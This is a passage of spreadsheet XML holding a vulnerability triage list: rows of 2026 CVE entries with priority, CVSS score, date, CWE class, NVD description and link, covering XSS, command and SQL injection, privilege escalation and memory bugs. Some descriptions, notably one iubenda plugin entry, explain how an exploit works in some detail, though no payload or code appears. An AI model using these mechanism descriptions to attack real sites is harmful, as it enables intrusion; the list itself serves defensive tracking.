      </c>
      <c r="J3030" s="5" t="inlineStr"/>
      <c r="K3030" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3030" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, responses from the CSS (Cascading Style Sheets) proxy were not validated, which may result in information disclosure or XSS (cross-site scripting) via MIME sniffing.</t>
        </is>
      </c>
      <c r="M3030" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74998</t>
        </is>
      </c>
    </row>
    <row r="3031">
      <c r="A3031" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3031" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75593</t>
        </is>
      </c>
      <c r="C3031" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3031" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3031" s="5" t="inlineStr"/>
      <c r="F3031" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3031" s="5" t="inlineStr"/>
      <c r="H3031" s="5" t="inlineStr"/>
      <c r="I3031" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3031" s="5" t="inlineStr"/>
      <c r="K3031" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3031" s="5" t="inlineStr">
        <is>
          <t>BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Prior to 0.31.2, a custom client can produce such an upload request to the BuildKit daemon that files can escape from the BuildKit-controlled state directory. The client needs to have valid permissions to access BuildKit control API to issue builds, eg., bypass authentication, etc. This issue is fixed in version 0.31.2.</t>
        </is>
      </c>
      <c r="M3031" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75593</t>
        </is>
      </c>
    </row>
    <row r="3032">
      <c r="A3032" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3032" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75927</t>
        </is>
      </c>
      <c r="C3032" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3032" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3032" s="5" t="inlineStr"/>
      <c r="F3032" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3032" s="5" t="inlineStr"/>
      <c r="H3032" s="5" t="inlineStr"/>
      <c r="I3032" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3032" s="5" t="inlineStr"/>
      <c r="K3032" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3032" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="M3032" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="3033">
      <c r="A3033" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3033" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76561</t>
        </is>
      </c>
      <c r="C3033" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3033" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3033" s="5" t="inlineStr"/>
      <c r="F3033" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3033" s="5" t="inlineStr"/>
      <c r="H3033" s="5" t="inlineStr"/>
      <c r="I3033" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3033" s="5" t="inlineStr"/>
      <c r="K3033" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3033" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t>
        </is>
      </c>
      <c r="M3033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t>
        </is>
      </c>
    </row>
    <row r="3034">
      <c r="A3034" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76562</t>
        </is>
      </c>
      <c r="C3034" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3034" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3034" s="5" t="inlineStr"/>
      <c r="F3034" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3034" s="5" t="inlineStr"/>
      <c r="H3034" s="5" t="inlineStr"/>
      <c r="I3034" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3034" s="5" t="inlineStr"/>
      <c r="K3034" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3034" s="5" t="inlineStr">
        <is>
          <t>The Sidebar Manager Light plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sbm_description' parameter in all versions up to, and including, 1.18 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76562</t>
        </is>
      </c>
    </row>
    <row r="3035">
      <c r="A3035" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77233</t>
        </is>
      </c>
      <c r="C3035" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3035" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3035" s="5" t="inlineStr"/>
      <c r="F3035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3035" s="5" t="inlineStr"/>
      <c r="H3035" s="5" t="inlineStr"/>
      <c r="I3035" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3035" s="5" t="inlineStr"/>
      <c r="K3035" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3035" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via AdSense Regex Rewrite in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only manifests when the 'Secondary' parser engine is active (parser_engine=default); it does not exist under the default 'new' DOM-based parser engine.</t>
        </is>
      </c>
      <c r="M3035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77233</t>
        </is>
      </c>
    </row>
    <row r="3036">
      <c r="A3036" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77263</t>
        </is>
      </c>
      <c r="C3036" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3036" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3036" s="5" t="inlineStr"/>
      <c r="F3036" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3036" s="5" t="inlineStr"/>
      <c r="H3036" s="5" t="inlineStr"/>
      <c r="I3036" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3036" s="5" t="inlineStr"/>
      <c r="K3036" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3036" s="5" t="inlineStr">
        <is>
          <t>The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content in all versions up to, and including, 3.13.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit works by embedding KSES-allowed markup such as abbr title attributes and HTML comments in a submitted comment so that the global strtr() substitution strips substrings from an inert tag, mutating it into an executable element such as an img onerror handler that runs in the WordPress origin for any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="M3036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77263</t>
        </is>
      </c>
    </row>
    <row r="3037">
      <c r="A3037" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77830</t>
        </is>
      </c>
      <c r="C3037" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3037" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3037" s="5" t="inlineStr"/>
      <c r="F3037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3037" s="5" t="inlineStr"/>
      <c r="H3037" s="5" t="inlineStr"/>
      <c r="I3037" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3037" s="5" t="inlineStr"/>
      <c r="K3037" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3037" s="5" t="inlineStr">
        <is>
          <t>The Spam protection, Honeypot, Anti-Spam by CleanTalk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content aria-label Placeholder in all versions up to, and including, 6.86 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is deliverable via unauthenticated comment submission and executes exclusively for non-logged-in visitors; if comment moderation is enabled, an approving moderator must first publish the comment before the script reaches other users.</t>
        </is>
      </c>
      <c r="M3037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77830</t>
        </is>
      </c>
    </row>
    <row r="3038">
      <c r="A3038" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78438</t>
        </is>
      </c>
      <c r="C3038" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3038" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3038" s="5" t="inlineStr"/>
      <c r="F3038" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3038" s="5" t="inlineStr"/>
      <c r="H3038" s="5" t="inlineStr"/>
      <c r="I3038" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3038" s="5" t="inlineStr"/>
      <c r="K3038" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3038" s="5" t="inlineStr">
        <is>
          <t>The W3 Total Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via LazyLoad Background Mutator in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the "Lazy Load Images" feature with "Process background images" to be enabled, and the malicious comment to be approved by a moderator before execution is triggered.</t>
        </is>
      </c>
      <c r="M3038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78438</t>
        </is>
      </c>
    </row>
    <row r="3039">
      <c r="A3039" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79426</t>
        </is>
      </c>
      <c r="C3039" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3039" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3039" s="5" t="inlineStr"/>
      <c r="F3039" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3039" s="5" t="inlineStr"/>
      <c r="H3039" s="5" t="inlineStr"/>
      <c r="I3039" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3039" s="5" t="inlineStr"/>
      <c r="K3039" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3039" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file deletion vulnerability in the /adminapi/file/video_data_save component of CRMEB v6.0.0 allows authenticated attackers to delete arbitrary files via crafted POST request.</t>
        </is>
      </c>
      <c r="M3039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79426</t>
        </is>
      </c>
    </row>
    <row r="3040">
      <c r="A3040" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="C3040" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3040" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3040" s="5" t="inlineStr"/>
      <c r="F3040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3040" s="5" t="inlineStr"/>
      <c r="H3040" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I3040" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3040" s="5" t="inlineStr"/>
      <c r="K3040" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3040" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M3040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="3041">
      <c r="A3041" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80127</t>
        </is>
      </c>
      <c r="C3041" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3041" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3041" s="5" t="inlineStr"/>
      <c r="F3041" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3041" s="5" t="inlineStr"/>
      <c r="H3041" s="5" t="inlineStr"/>
      <c r="I3041" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3041" s="5" t="inlineStr"/>
      <c r="K3041" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3041" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M3041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80127</t>
        </is>
      </c>
    </row>
    <row r="3042">
      <c r="A3042" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="C3042" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3042" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3042" s="5" t="inlineStr"/>
      <c r="F3042" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3042" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H3042" s="5" t="inlineStr"/>
      <c r="I3042" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3042" s="5" t="inlineStr"/>
      <c r="K3042" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3042" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="3043">
      <c r="A3043" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81431</t>
        </is>
      </c>
      <c r="C3043" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3043" s="5" t="inlineStr"/>
      <c r="F3043" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3043" s="5" t="inlineStr"/>
      <c r="H3043" s="5" t="inlineStr"/>
      <c r="I3043" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3043" s="5" t="inlineStr"/>
      <c r="K3043" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3043" s="5" t="inlineStr">
        <is>
          <t>The Registration Form for WooCommerce WordPress plugin before 1.1.3 does not validate that the form referenced during registration is a legitimate registration form, reading the permitted-role allow-list from an arbitrary attacker-controlled post instead. A user able to create a post (Contributor and above) can therefore register a new account with an arbitrary role, including Administrator, leading to full site takeover. This is an incomplete fix of CVE-2026-54807.</t>
        </is>
      </c>
      <c r="M3043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81431</t>
        </is>
      </c>
    </row>
    <row r="3044">
      <c r="A3044" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81754</t>
        </is>
      </c>
      <c r="C3044" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3044" s="5" t="inlineStr"/>
      <c r="F3044" s="5" t="inlineStr"/>
      <c r="G3044" s="5" t="inlineStr"/>
      <c r="H3044" s="5" t="inlineStr"/>
      <c r="I3044" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3044" s="5" t="inlineStr"/>
      <c r="K3044" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3044" s="5" t="inlineStr">
        <is>
          <t>The Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner… plugin for WordPress is vulnerable to Stored Cross-Site Scripting via User-Agent Header in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The malicious payload is delivered passively by any unauthenticated visitor who triggers a failed login attempt with a crafted User-Agent header, requiring no further interaction from the attacker once stored.</t>
        </is>
      </c>
      <c r="M3044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81754</t>
        </is>
      </c>
    </row>
    <row r="3045">
      <c r="A3045" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81806</t>
        </is>
      </c>
      <c r="C3045" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3045" s="5" t="inlineStr"/>
      <c r="F3045" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3045" s="5" t="inlineStr"/>
      <c r="H3045" s="5" t="inlineStr"/>
      <c r="I3045" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3045" s="5" t="inlineStr"/>
      <c r="K3045" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3045" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.
This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t>
        </is>
      </c>
      <c r="M3045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t>
        </is>
      </c>
    </row>
    <row r="3046">
      <c r="A3046" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81825</t>
        </is>
      </c>
      <c r="C3046" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3046" s="5" t="inlineStr"/>
      <c r="F3046" s="5" t="inlineStr"/>
      <c r="G3046" s="5" t="inlineStr"/>
      <c r="H3046" s="5" t="inlineStr"/>
      <c r="I3046" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3046" s="5" t="inlineStr"/>
      <c r="K3046" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3046" s="5" t="inlineStr">
        <is>
          <t>The Simple Ajax Chat – Add a Fast, Secure Chat Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Chat Message in all versions up to, and including, &lt;= 20260811 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce protecting chat message submission is publicly visible on the chat page, rendering it ineffective as an authentication barrier and allowing fully unauthenticated attackers to submit malicious messages that are stored persistently and rendered to all visitors on every page load.</t>
        </is>
      </c>
      <c r="M3046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81825</t>
        </is>
      </c>
    </row>
    <row r="3047">
      <c r="A3047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="C3047" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3047" s="5" t="inlineStr"/>
      <c r="F3047" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3047" s="5" t="inlineStr"/>
      <c r="H3047" s="5" t="inlineStr"/>
      <c r="I3047" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3047" s="5" t="inlineStr"/>
      <c r="K3047" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3047" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue exists in the server's query execution memory tracking subsystem. An authenticated user with read privileges can trigger a write to freed heap memory through a sequence of standard database commands, leading to server process crash or potential memory corruption. No user interaction is required.</t>
        </is>
      </c>
      <c r="M3047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="3048">
      <c r="A3048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="C3048" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3048" s="5" t="inlineStr"/>
      <c r="F3048" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3048" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3048" s="5" t="inlineStr"/>
      <c r="I3048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3048" s="5" t="inlineStr"/>
      <c r="K3048" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3048" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of storage engine configuration options in MongoDB Server allows an authenticated user with write privileges to supply crafted parameters during collection creation that override internal storage metadata. This results in an out-of-bounds memory write in the server process, causing a denial of service via server crash, with potential for further impact including arbitrary code execution.</t>
        </is>
      </c>
      <c r="M3048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="3049">
      <c r="A3049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83593</t>
        </is>
      </c>
      <c r="C3049" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3049" s="5" t="inlineStr"/>
      <c r="F3049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3049" s="5" t="inlineStr"/>
      <c r="H3049" s="5" t="inlineStr"/>
      <c r="I3049" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3049" s="5" t="inlineStr"/>
      <c r="K3049" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3049" s="5" t="inlineStr">
        <is>
          <t>The WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'conversation' parameter in all versions up to, and including, 8.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The action is gated only by a nonce that is localized into every public-facing page via wp_localize_script, rendering the nonce check ineffective as an access control barrier for unauthenticated users.</t>
        </is>
      </c>
      <c r="M3049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83593</t>
        </is>
      </c>
    </row>
    <row r="3050">
      <c r="A3050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83595</t>
        </is>
      </c>
      <c r="C3050" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3050" s="5" t="inlineStr"/>
      <c r="F3050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3050" s="5" t="inlineStr"/>
      <c r="H3050" s="5" t="inlineStr"/>
      <c r="I3050" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3050" s="5" t="inlineStr"/>
      <c r="K3050" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3050" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a cross-site request forgery vulnerability in plugin/API/set.json.php that allows attackers to perform state-changing actions by crafting GET requests that bypass CSRF protection. Attackers can navigate a victim's browser to a malicious URL with API parameters to delete videos, deactivate accounts, or modify playlists without user interaction.</t>
        </is>
      </c>
      <c r="M3050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83595</t>
        </is>
      </c>
    </row>
    <row r="3051">
      <c r="A3051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83625</t>
        </is>
      </c>
      <c r="C3051" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
